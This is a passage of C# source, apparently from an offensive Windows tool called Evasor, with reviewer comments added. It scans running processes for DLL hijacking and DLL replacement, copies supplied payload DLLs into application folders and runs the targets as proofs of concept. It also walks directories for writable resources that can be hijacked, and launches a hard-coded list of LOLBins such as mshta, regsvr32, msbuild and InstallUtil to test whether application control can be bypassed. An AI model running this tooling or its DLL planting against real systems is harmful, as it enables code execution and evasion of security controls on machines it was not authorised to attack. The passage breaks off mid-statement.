processs.StartInfo.Arguments); 785 | proof_Of_Concepts.Add("POC --> Copy " + PATH_OF_Evasor + @"\DLLs\" + dll + " To " + Path.GetDirectoryName(processs.StartInfo.FileName) + " rename it to the DLL you chose and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments); 786 | Console.BackgroundColor = ConsoleColor.Black; 787 | Console.ForegroundColor = ConsoleColor.Gray; 788 | Console.WriteLine("Take a screen shot? (y/n)"); 789 | if (Console.ReadLine() == "y") 790 | { 791 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + dllIndex.ToString() + "_dll-Hijack.jpeg"))); 792 | } 793 | processs.WaitForExit(); 794 | File.Delete(sub_Paths[1]); 795 | } 796 | else 797 | { 798 | Console.WriteLine("Replace the DLL? 
(y/n)"); 799 | poc = Console.ReadLine(); 800 | if (poc == "y") 801 | { 802 | Console.ForegroundColor = ConsoleColor.Yellow; 803 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 804 | Console.ForegroundColor = ConsoleColor.Gray; 805 | foreach (string str in List_Of_Replaceble_dlls) 806 | { 807 | Console.WriteLine(i.ToString() + "." + str); 808 | i++; 809 | } 810 | Console.ForegroundColor = ConsoleColor.Yellow; 811 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 812 | Console.ForegroundColor = ConsoleColor.Gray; 813 | Console.ForegroundColor = ConsoleColor.Yellow; 814 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 815 | Console.ForegroundColor = ConsoleColor.Gray; 816 | Console.WriteLine("Enter one of the follwing DLL's (cmd.dll,x64.dll,x86.dll)."); 817 | dll = Console.ReadLine(); 818 | Console.ForegroundColor = ConsoleColor.Yellow; 819 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 820 | Console.ForegroundColor = ConsoleColor.Gray; 821 | Console.WriteLine("Which DLL to Replace? 
(0-" + (i - 1).ToString() + ")"); 822 | int dllIndex = int.Parse(Console.ReadLine()); 823 | sub_Paths = List_Of_Replaceble_dlls[dllIndex].Split('^'); 824 | System.IO.File.Move(sub_Paths[1], PATH_OF_Evasor + @"\BACKUP\temp.dll"); 825 | System.IO.File.Copy(PATH_OF_Evasor + @"\DLLs\" + dll, sub_Paths[1]); 826 | Console.ForegroundColor = ConsoleColor.Yellow; 827 | Console.WriteLine("___________________________________________________________________________________________________________________________________________"); 828 | Console.ForegroundColor = ConsoleColor.Gray; 829 | Console.WriteLine("Type any key to run " + sub_Paths[0] + "!!!"); 830 | Console.ReadLine(); 831 | Process processs = new Process(); 832 | processs.StartInfo.FileName = sub_Paths[0]; 833 | Console.BackgroundColor = ConsoleColor.DarkGreen; 834 | Console.ForegroundColor = ConsoleColor.White; 835 | Console.WriteLine("POC --> Replace " + PATH_OF_Evasor + @"\DLLs\" + dll + " with " + sub_Paths[1] + " and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments); 836 | proof_Of_Concepts.Add("POC --> Replace " + PATH_OF_Evasor + @"\DLLs\" + dll + " with " + sub_Paths[1] + " and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments); 837 | Console.BackgroundColor = ConsoleColor.Black; 838 | Console.ForegroundColor = ConsoleColor.Gray; 839 | Console.WriteLine("Take a screen shot? 
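(y/n)");
                        if (Console.ReadLine() == "y")
                        {
                            proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + dllIndex.ToString() + "_dll-Replace.jpeg")));
                        }
                        // NOTE(review): no processs.Start() is visible between the StartInfo setup above and this
                        // WaitForExit(); if there is none, WaitForExit throws and the restore below never runs,
                        // leaving the Evasor DLL in place of the original - confirm against the lines above this chunk.
                        processs.WaitForExit();
                        // Undo the replacement: drop the planted DLL and move the backed-up original back.
                        File.Delete(sub_Paths[1]);
                        System.IO.File.Move(PATH_OF_Evasor + @"\BACKUP\temp.dll", sub_Paths[1]);
                    }
                }
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.Write("To exit and return to main menu type ");
                Console.ForegroundColor = ConsoleColor.Green;
                Console.Write("break");
                Console.ForegroundColor = ConsoleColor.Gray;
                Console.WriteLine(" else press Enter....");
                if (proof_Of_Concepts_Pictures.Count != 0)
                {
                    // NOTE(review): Report pairs i_Pocs[i] with i_Pics[i] for every POC, but a POC line is added on
                    // every run while a picture is added only after "y" - more POCs than pictures overruns i_Pics.
                    Report.Scan_for_Process_vulnerable_to_DLL_hijack_DLL_replacement(List_Of_Hijckable_dlls, List_Of_Replaceble_dlls, proof_Of_Concepts, proof_Of_Concepts_Pictures);
                }
                if (Console.ReadLine() == "break")
                {
                    break;
                }
            }
        }

        // Prints, for every file recorded as a "hijackable resource", which of the path-like tokens in
        // file_ends_and_starts its content mentions and which processes currently hold it open.
        // The file list comes from hijackble_respurces.txt next to Evasor when that file exists, otherwise a
        // fresh Scan_for_resource_hijacking() is run first. Console output only; per-file failures are logged
        // to `log` and do not abort the listing.
        private static void console_Resources_Hijack_Bypass_prints()
        {
            List_Of_hijackble_resources = new List<string>();

            // Check and open the SAME file: the original tested the PATH_OF_Evasor-relative name but then opened a
            // current-directory-relative one, which throws whenever Evasor is not run from its own folder.
            string cachedListPath = PATH_OF_Evasor + @"\hijackble_respurces.txt";
            if (!File.Exists(cachedListPath))
            {
                Scan_for_resource_hijacking();
            }
            else
            {
                using (StreamReader cached = new StreamReader(cachedListPath))
                {
                    string entry;
                    while ((entry = cached.ReadLine()) != null)
                    {
                        List_Of_hijackble_resources.Add(entry);
                    }
                }
            }

            foreach (string hijackableResource in List_Of_hijackble_resources)
            {
                try
                {
                    string canHijack = string.Empty;
                    List<string> referencedPaths = new List<string>();
                    // The whole file is read into memory, binaries included (the PE-stub check below relies on that).
                    string[] contentLines = Regex.Split(File.ReadAllText(hijackableResource), "\n");
                    foreach (string contentLine in contentLines)
                    {
                        foreach (string token in file_ends_and_starts)
                        {
                            if (contentLine.Contains("This program cannot be run in DOS mode"))
                            {
                                // DOS-stub text: the "resource" is itself an executable image.
                                canHijack += ".program ";
                                referencedPaths.Add("This program cannot be run in DOS mode ");
                            }
                            else if (contentLine.ToLowerInvariant().Contains(token))
                            {
                                canHijack += token + " ";
                                referencedPaths.Add(contentLine + " ");
                            }
                        }
                    }
                    if (canHijack == string.Empty)
                    {
                        continue;
                    }

                    // Who holds the file open right now (best-effort: enumeration or owner lookup may be denied).
                    try
                    {
                        Console.ForegroundColor = ConsoleColor.Yellow;
                        Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
                        Console.ForegroundColor = ConsoleColor.Gray;
                        List<Process> lockers = FileUtil.WhoIsLocking(hijackableResource);
                        Console.ForegroundColor = ConsoleColor.Green;
                        foreach (Process locker in lockers)
                        {
                            try
                            {
                                string owner = GetProcessExtraInformation(locker.Id);
                                Console.WriteLine("_Process:{0} PID:{1} Owner:{2}", locker.ProcessName, locker.Id, owner);
                                Console.WriteLine(@"\");
                            }
                            catch (Exception)
                            {
                                // Owner lookup failed for this process (access denied / already exited): skip it.
                            }
                        }
                        Console.ForegroundColor = ConsoleColor.Gray;
                    }
                    catch (Exception)
                    {
                        // Lock-holder enumeration failed; the resource itself is still reported below.
                    }

                    Console.Write(" " + hijackableResource + " ");
                    Console.ForegroundColor = ConsoleColor.Green;
                    // Collapse repeated tokens and strip punctuation picked up from the surrounding text.
                    string hitSummary = string.Join(" ", canHijack.Split(' ').Distinct());
                    foreach (string junk in new string[] { "<", ",", "\"", ">", "\n", "'", ")" })
                    {
                        hitSummary = hitSummary.Replace(junk, string.Empty);
                    }
                    hitSummary = string.Join(" ", hitSummary.Split(' ').Distinct());
                    Console.Write(hitSummary);
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine(" file path's can be hijacked !!!");

                    // Referenced paths are listed for text-like resources and logs only; for binaries they are noise.
                    bool isBinaryResource = hijackableResource.Contains(".exe") || hijackableResource.Contains(".dll")
                        || hijackableResource.Contains(".msi") || hijackableResource.Contains(".lib")
                        || hijackableResource.Contains(".EXE") || hijackableResource.Contains(".DLL")
                        || hijackableResource.Contains(".MSI") || hijackableResource.Contains(".LIB");
                    bool isLogResource = hijackableResource.Contains(".log") || hijackableResource.Contains(".LOG");
                    Console.ForegroundColor = ConsoleColor.Cyan;
                    if (!isBinaryResource || isLogResource)
                    {
                        foreach (string referenced in referencedPaths)
                        {
                            Console.Write(@" \____");
                            Console.WriteLine(referenced);
                        }
                    }
                    Console.ForegroundColor = ConsoleColor.Gray;
                }
                catch (Exception ex)
                {
                    // Unreadable or vanished file: record it and continue with the next resource.
                    log.Add(hijackableResource + ": " + ex.Message);
                }
            }
        }

        // Runs `filename command` without a window and returns everything it wrote to stdout, or "" if it could
        // not be started. The original set RedirectStandardOutput = false and then read StandardOutput, which
        // always throws, so every caller silently got "".
        public static string OpenInerProcess(string filename, string command)
        {
            try
            {
                using (Process process = new Process())
                {
                    process.StartInfo.FileName = filename;
                    process.StartInfo.Arguments = command;
                    process.StartInfo.UseShellExecute = false;
                    // Must be true for StandardOutput to be readable at all.
                    process.StartInfo.RedirectStandardOutput = true;
                    // WindowStyle is ignored when UseShellExecute is false; CreateNoWindow is what actually hides it.
                    process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                    process.StartInfo.CreateNoWindow = true;
                    process.Start();
                    // Drain stdout before waiting so a chatty child cannot block on a full pipe.
                    string output = process.StandardOutput.ReadToEnd();
                    process.WaitForExit();
                    return output;
                }
            }
            catch (Exception)
            {
                return string.Empty;
            }
        }

        // Creates `filename` containing `content` plus a newline, unless it already exists - an existing file
        // (for example a probe left behind by an earlier run) is reused untouched.
        private static void CreateFile(string filename, string content)
        {
            if (File.Exists(filename))
            {
                return;
            }
            using (StreamWriter writer = File.AppendText(filename))
            {
                writer.WriteLine(content);
            }
        }

        // Probes every other running process for DLL hijacking (a referenced module missing from the process
        // directory while that directory is writable) and DLL replacement (the module exists and can be renamed).
        // Hits are appended to List_Of_Hijckable_dlls / List_Of_Replaceble_dlls as "exe path^module path".
        // WARNING: these are destructive probes - a dummy file is briefly planted under the missing module's name
        // and live DLLs are renamed and renamed back; a hit does not by itself prove the loader would prefer the
        // planted copy (KnownDLLs, manifests and full-path LoadLibrary calls are not considered by this probe).
        // The `dll` parameter is not used by this method.
        private static void Scan_Process_Vulnerable_To_Dll_Hijack(string dll)
        {
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("_______________________________________________");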
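Console.WriteLine("|Scanning for Process vulnerable to DLL Hijack!|");
            Console.WriteLine("|______________________________________________|");
            Console.ForegroundColor = ConsoleColor.Gray;
            try
            {
                // Resolved once: the scanner itself (and its Visual Studio host) is never probed, and the
                // dummy file used by the hijack probe lives next to the current directory under the scanner's name.
                string selfName = Process.GetCurrentProcess().ProcessName;
                string probeSource = Path.GetFullPath(selfName + ".txt");
                Native moduleWalker = new Native();

                foreach (Process target in Process.GetProcesses())
                {
                    if (target.ProcessName == selfName || target.ProcessName == selfName + ".vshost")
                    {
                        continue;
                    }
                    try
                    {
                        string exeDir = Path.GetDirectoryName(ProcessExecutablePath(target));
                        foreach (Module m in moduleWalker.CollectModules(target))
                        {
                            // The process's own image is printed as a section header and never probed.
                            if (m.ModuleName.Contains(".exe") || m.ModuleName.Contains(".EXE"))
                            {
                                try
                                {
                                    PrintProcessHeader(target);
                                }
                                catch (Exception)
                                {
                                    // Header is cosmetic (owner/path lookup may be denied); keep scanning the modules.
                                }
                                continue;
                            }

                            string modulePath = exeDir + @"\" + m.ModuleName;
                            try
                            {
                                if (!File.Exists(modulePath))
                                {
                                    ProbeHijackable(target, m.ModuleName, probeSource, modulePath);
                                }
                                else
                                {
                                    ProbeReplaceable(target, m.ModuleName, modulePath, exeDir + @"\" + "HIJACK" + m.ModuleName);
                                }
                            }
                            catch (Exception)
                            {
                                // Directory not writable or file locked: not hijackable/replaceable from this context.
                                Console.ForegroundColor = ConsoleColor.Red;
                                Console.WriteLine(m.ModuleName);
                                Console.ForegroundColor = ConsoleColor.Gray;
                            }
                        }
                    }
                    catch (Exception)
                    {
                        // Executable path or module list unavailable (access denied / process exited): skip it.
                    }
                }
            }
            catch (Exception)
            {
                // Process enumeration itself failed; nothing to report.
            }
        }

        // Banner printed once per scanned process by Scan_Process_Vulnerable_To_Dll_Hijack.
        private static void PrintProcessHeader(Process target)
        {
            Console.WriteLine("________________________________________________________________________________________________________________________________________________________________________________________");
            Console.WriteLine("|Process:{0} PID:{1} Owner:{2} Path:{3}", target.ProcessName, target.Id, GetProcessExtraInformation(target.Id), ProcessExecutablePath(target));
            Console.WriteLine("|_______________________________________________________________________________________________________________________________________________________________________________________|");
        }

        // Hijack probe: plants a tiny text file under the name of a module that is missing from the process
        // directory and removes it again. Throws on the Move when the directory is not writable (= no hit).
        // If the cleanup fails the dummy file is left behind, so that case is reported loudly.
        private static void ProbeHijackable(Process target, string moduleName, string probeSource, string modulePath)
        {
            CreateFile(probeSource, "Evasor");
            System.IO.File.Move(probeSource, modulePath);
            // A process resolving the module in this window would load the dummy file: keep it as short as possible.
            try
            {
                System.IO.File.Delete(modulePath);
            }
            catch (Exception cleanupError)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("!!! could not remove probe file " + modulePath + " - delete it by hand: " + cleanupError.Message);
                Console.ForegroundColor = ConsoleColor.Gray;
            }
            Console.Write(moduleName);
            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine(" Hijackable !!! ");
            Console.ForegroundColor = ConsoleColor.Gray;
            List_Of_Hijckable_dlls.Add(ProcessExecutablePath(target) + "^" + modulePath);
        }

        // Replace probe: renames an existing module to HIJACK<name> and straight back. Throws on the first
        // rename when the file is locked or the directory is read-only (= no hit). A failed rename-back leaves
        // the application broken, so it is reported with both paths and the module is NOT counted as a hit.
        private static void ProbeReplaceable(Process target, string moduleName, string modulePath, string probePath)
        {
            System.IO.File.Move(modulePath, probePath);
            try
            {
                System.IO.File.Move(probePath, modulePath);
            }
            catch (Exception restoreError)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("!!! " + modulePath + " is still renamed to " + probePath + " - restore it by hand: " + restoreError.Message);
                Console.ForegroundColor = ConsoleColor.Gray;
                return;
            }
            Console.Write(moduleName);
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine(" Replacable !!!");
            Console.ForegroundColor = ConsoleColor.Gray;
            List_Of_Replaceble_dlls.Add(ProcessExecutablePath(target) + "^" + modulePath);
        }

        // Recursively scans `root` for files whose content mentions one of the file_extentions tokens and that
        // can be renamed (used as a proxy for "writable"). Hits are printed, appended to hijackble_respurces.txt
        // and added to List_Of_hijackble_resources; access problems go to `log`.
        // WARNING: every candidate file is read fully into memory and renamed twice - a destructive probe. A
        // failed rename-back leaves the file as HIJACK<name> and is reported on the console.
        // NOTE(review): the cache file is written relative to the current directory, while
        // console_Resources_Hijack_Bypass_prints looks for it under PATH_OF_Evasor; the two only agree when
        // Evasor is run from its own folder.
        private static void WalkDirectoryTree(System.IO.DirectoryInfo root)
        {
            System.IO.FileInfo[] files = null;
            try
            {
                files = root.GetFiles("*.*");
            }
            catch (UnauthorizedAccessException e)
            {
                // Recorded, not fatal: keep going with whatever else is reachable.
                log.Add(e.Message);
            }
            catch (System.IO.DirectoryNotFoundException e)
            {
                Console.WriteLine(e.Message);
            }

            if (files == null)
            {
                return;
            }

            string selfName = Process.GetCurrentProcess().ProcessName;
            foreach (System.IO.FileInfo fi in files)
            {
                try
                {
                    // Skip Evasor's own files (any path containing the scanner's process name).
                    if (fi.FullName.Contains(selfName))
                    {
                        continue;
                    }
                    if (!isContains(System.IO.File.ReadAllText(fi.FullName)))
                    {
                        continue;
                    }

                    string probePath = Path.GetDirectoryName(fi.FullName) + @"\" + @"HIJACK" + Path.GetFileName(fi.FullName);
                    try
                    {
                        System.IO.File.Move(fi.FullName, probePath);
                    }
                    catch (Exception)
                    {
                        // Cannot rename: not writable from this context, not a hit.
                        continue;
                    }
                    try
                    {
                        System.IO.File.Move(probePath, fi.FullName);
                    }
                    catch (Exception restoreError)
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("!!! " + fi.FullName + " is still renamed to " + probePath + " - restore it by hand: " + restoreError.Message);
                        Console.ForegroundColor = ConsoleColor.Gray;
                        continue;
                    }

                    Console.Write(fi.FullName + " ");
                    using (System.IO.StreamWriter cache = new System.IO.StreamWriter(@"hijackble_respurces.txt", true))
                    {
                        cache.WriteLine(fi.FullName);
                    }
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.Write("Writable ");
                    Console.ForegroundColor = ConsoleColor.Gray;
                    Console.WriteLine("file path's can be hijacked !!!");
                    List_Of_hijackble_resources.Add(fi.FullName);
                }
                catch (Exception)
                {
                    // Unreadable or vanished file (or out of memory on a huge one): skip it.
                }
            }

            // Subdirectory listing was unguarded in the original: one access-denied folder aborted the whole walk.
            System.IO.DirectoryInfo[] subDirs;
            try
            {
                subDirs = root.GetDirectories();
            }
            catch (UnauthorizedAccessException e)
            {
                log.Add(e.Message);
                return;
            }
            catch (System.IO.DirectoryNotFoundException e)
            {
                Console.WriteLine(e.Message);
                return;
            }

            foreach (System.IO.DirectoryInfo dirInfo in subDirs)
            {
                // Junctions and symlinked directories are skipped: they can cycle, and their targets are reached
                // through the real path anyway.
                if ((dirInfo.Attributes & FileAttributes.ReparsePoint) != 0)
                {
                    continue;
                }
                WalkDirectoryTree(dirInfo);
            }
        }

        // True when the given file content mentions any of the file_extentions tokens.
        private static bool isContains(string i_Path)
        {
            foreach (string token in file_extentions)
            {
                if (i_Path.Contains(token))
                {
                    return true;
                }
            }
            return false;
        }

        // Prints the DACL of the process's executable (account / allow-or-deny / rights / inherited) as an
        // indented tree. Throws if the executable path cannot be resolved or its security descriptor read.
        private static void printPremissiomns(Process i_process)
        {
            FileSecurity security = File.GetAccessControl(ProcessExecutablePath(i_process));
            AuthorizationRuleCollection acl = security.GetAccessRules(true, true, typeof(System.Security.Principal.NTAccount));
            foreach (FileSystemAccessRule ace in acl)
            {
                Console.WriteLine(@"\___" + string.Format("Account: {0}", ace.IdentityReference.Value));
                Console.WriteLine(@" \___" + string.Format("Type: {0}", ace.AccessControlType));
                Console.WriteLine(@" \___" + string.Format("Rights: {0}", ace.FileSystemRights));
                Console.WriteLine(@" \___" + string.Format("Inherited ACE: {0}", ace.IsInherited));
                Console.WriteLine();
            }
        }

        // Full path of the process's main executable, or "" when it cannot be determined. MainModule is tried
        // first; when that is denied (typically another user's process or a bitness mismatch) a WMI
        // Win32_Process query is used instead.
        private static string ProcessExecutablePath(Process process)
        {
            try
            {
                return process.MainModule.FileName;
            }
            catch
            {
                // Filtering in WMI avoids enumerating every process on each call (this helper runs once per module
                // during the scans). process.Id is an int, so building the filter from it cannot inject WQL.
                string query = "SELECT ExecutablePath, ProcessID FROM Win32_Process WHERE ProcessID = " + process.Id;
                ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);

                foreach (ManagementObject item in searcher.Get())
                {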
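object id = item["ProcessID"];
                    object path = item["ExecutablePath"];

                    // Compared as strings: the WMI value comes back boxed and its numeric type is not relied on.
                    if (path != null && id.ToString() == process.Id.ToString())
                    {
                        return path.ToString();
                    }
                }
            }

            return "";
        }

        // UTF-8 encodes `plainText` and returns it as a Base64 string.
        private static string Base64Encode(string plainText)
        {
            byte[] raw = Encoding.UTF8.GetBytes(plainText);
            return Convert.ToBase64String(raw);
        }

        // Inverse of Base64Encode; throws FormatException on malformed input.
        private static string Base64Decode(string base64EncodedData)
        {
            byte[] raw = Convert.FromBase64String(base64EncodedData);
            return Encoding.UTF8.GetString(raw);
        }

        // Launch probe used by the AppControl check: starts `FileName Args` hidden (UseShellExecute is left at its
        // default so the .cmd/.vbs entries are resolved through their file association) and terminates it.
        // Returns -1 when the binary launched - the value the caller's `exitcode == -1` test expects - and 9
        // when it could not be started. A 9 covers a policy block, a missing file and an access-denied alike,
        // so it means "did not start", not specifically "blocked by AppLocker/WDAC".
        // The original returned process.ExitCode right after Kill(): Kill is asynchronous, so ExitCode could be
        // read before the process was gone, and a binary that exited on its own (usage text, no args) made
        // Kill() throw and was reported as "can't bypass" even though it ran.
        private static int OpenProcessScan(string FileName, string Args)
        {
            try
            {
                using (Process process = new Process())
                {
                    process.StartInfo.FileName = FileName;
                    process.StartInfo.Arguments = Args;
                    process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                    process.Start();
                    try
                    {
                        process.Kill();
                    }
                    catch (InvalidOperationException)
                    {
                        // Already exited on its own: it still launched, which is all this probe tests.
                    }
                    // Bounded wait: a child that ignored Kill (or is waiting on stdin) must not hang the scan.
                    process.WaitForExit(5000);
                    return -1;
                }
            }
            catch (Exception)
            {
                return 9;
            }
        }

        // Tries to launch a fixed list of well-known LOLBins / script hosts and reports each one that starts as
        // "can bypass APP CONTROL". A hit only shows that this user can execute that binary - it does not prove
        // a rule was evaded - and a miss also covers "file not present": the paths are hard-coded to C:\ and to
        // English "Program Files" folders. The candidate list is a class-level field that is only appended to
        // here, so running this twice appends the same entries again.
        // NOTE(review): from a 32-bit build the System32 paths are presumably subject to WOW64 file-system
        // redirection, in which case the System32 and SysWOW64 entries test the same binary.
        private static void search_for_executables_that_can_bypass_appControl()
        {
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("______________________________________________________________________");
            Console.WriteLine("|Scanning for executibles which can bypass AppControl rules");
            Console.WriteLine("|_____________________________________________________________________|");
            Console.ForegroundColor = ConsoleColor.Gray;

            list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\regedit.exe");
            list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\at.exe");
            list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\at.exe");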
list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\reg.exe"); 1287 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\reg.exe"); 1288 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\cmd.exe"); 1289 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\cmd.exe"); 1290 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\winrm.cmd"); 1291 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\winrm.cmd"); 1292 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\cmstp.exe"); 1293 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\cmstp.exe"); 1294 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Mshta.exe"); 1295 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Mshta.exe"); 1296 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\control.exe"); 1297 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\control.exe"); 1298 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Cscript.exe"); 1299 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Cscript.exe"); 1300 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Wscript.exe"); 1301 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Wscript.exe"); 1302 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\msiexec.exe"); 1303 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\msiexec.exe"); 1304 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regedit.exe"); 1305 | 
list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regedit.exe"); 1306 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regedt32.exe"); 1307 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regedt32.exe"); 1308 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Odbcconf.exe"); 1309 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Odbcconf.exe"); 1310 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\SchTasks.exe"); 1311 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\SchTasks.exe"); 1312 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\forfiles.exe"); 1313 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\forfiles.exe"); 1314 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\regsvr32.exe"); 1315 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\regsvr32.exe"); 1316 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\rundll32.exe"); 1317 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\rundll32.exe"); 1318 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\ATBroker.exe"); 1319 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\ATBroker.exe"); 1320 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\wbem\wmic.exe"); 1321 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\wbem\wmic.exe"); 1322 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Mavinject.exe"); 1323 | 
list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Mavinject.exe"); 1324 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files\dotnet\dotnet.exe"); 1325 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\InfDefaultInstall.exe"); 1326 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\InfDefaultInstall.exe"); 1327 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"); 1328 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"); 1329 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"); 1330 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"); 1331 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Regasm.exe"); 1332 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Regasm.exe"); 1333 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Regsvc.exe"); 1334 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Regsvc.exe"); 1335 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\msbuild.exe"); 1336 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe"); 1337 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\Printing_Admin_Scripts\en-US\Pubprn.vbs"); 1338 | 
list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\Pubprn.vbs"); 1339 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell_ise.exe"); 1340 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell_ise.exe"); 1341 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe"); 1342 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"); 1343 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\F#\4.0\Framework\v4.0\fsi.exe"); 1344 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.6.1 Tools\Tracker.exe"); 1345 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\Tracker.exe"); 1346 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.6.1 Tools\x64\Tracker.exe"); 1347 | list_of_potential_executables_that_can_bypass_appControl.Add(@"c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe"); 1348 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\Roslyn\csi.exe"); 1349 | list_of_potential_executables_that_can_bypass_appControl.Add(@"C:\Program Files (x86)\Microsoft Visual Studio\2017\Enterprise\MSBuild\15.0\Bin\amd64\Tracker.exe"); 1350 | 1351 | 1352 | foreach (string executible in list_of_potential_executables_that_can_bypass_appControl) 1353 | { 1354 | int 